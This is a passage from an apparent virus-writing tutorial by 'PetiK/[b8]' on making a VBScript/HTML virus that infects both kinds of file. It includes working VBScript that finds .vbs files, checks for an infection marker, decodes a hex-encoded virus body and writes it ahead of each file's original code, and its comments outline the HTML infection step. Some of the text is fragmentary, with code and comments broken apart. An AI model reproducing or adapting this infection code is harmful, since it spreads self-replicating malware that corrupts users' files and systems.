If End Function </script></body></html> really simple no ?? ################### # IV: VBS -> HTML # ################### So this is the the last part. Look at the second part, I write ...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS ' check extension ' already infected ?? ' the mark

' err number if user click NO

' call the infhtm function ' in specific folder (better)

' put the mark ' put the real code ' put te htm virus

We must search here the VBS file. The same way that we infect HTM/HTML file. In the HTML virus we have : If ext="htm" or ext="html" Then So we add ElseIf ext="vbs" Then Set cot = fso.OpenTextFile(f1.Path, 1, False) If cot.ReadLine <> "'mark" Then cot.Close Set cot = fso.OpenTextFile(f1.Path, 1, False) vbsorg = cot.ReadAll() cot.Close ----------- here we infect the VBS file -----------

' check is already infected

For Y=1 To Len(vbshex) Step 2 virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2)) Next Set inf = fso.OpenTextFile(f1.Path, 2, True) inf.Write virvbs inf.WriteLine "" inf.WriteLine (vbsorg) inf.Close ----------- here we infect the VBS file ----------End If

' write virus code ' write real code

################### # V: CONCLUSION : # ################### This is the end of the article. If you have some suggestions or new ideas, please mail me to petikvx@aol.fr. PetiK/[b8] (www.petikvx.fr.fm)

Sign up to vote on this title
UsefulNot useful